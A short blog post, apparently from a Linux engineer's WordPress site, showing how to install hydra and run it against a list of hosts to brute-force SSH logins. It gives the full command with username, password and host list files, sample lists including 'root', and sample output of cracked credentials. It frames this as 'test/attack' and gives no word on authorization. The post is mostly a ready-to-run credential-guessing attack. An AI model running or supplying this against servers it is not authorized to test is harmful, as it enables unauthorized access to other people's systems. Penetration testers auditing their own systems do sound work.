How to use hydra to test/crack ssh credentials for a list of servers

To install hydra on Ubuntu:

sudo apt install hydra

Simply, to start our test/attack, we have a list of usernames, list of passwords and list of servers:

hydra -L users.txt -P passes.txt -u -M hosts.txt ssh -o Report.txt

Where:

users.txt is the file containing the user names, one per line, e.g.

root
user1
user2
user3

passes.txt is the list of passwords, one per line as well, e.g.

expectedpass1
expectedpass2
expectedpass3

hosts.txt is the list of IPs to test/attack, one per line, e.g.

192.168.100.20
192.168.20.24
10.165.34.56

Report.txt is the file containing the list of servers that could be cracked using values of users/passes/hosts from the files we provided, e.g.

[22][ssh] host: 192.168.100.21   login: root   password: expectedpass1
[22][ssh] host: 192.168.100.22 login: user1 password: expectedpass2
[22][ssh] host: 192.168.100.23 login: user2 password: expectedpass3

That’s it, Enjoy!

Sources: Mainly the hydra man page and some online forums

About SoCRaT

Research Support and Infrastructure Engineer, OSS & Linux Geek
This entry was posted in Linux and tagged , , , . Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s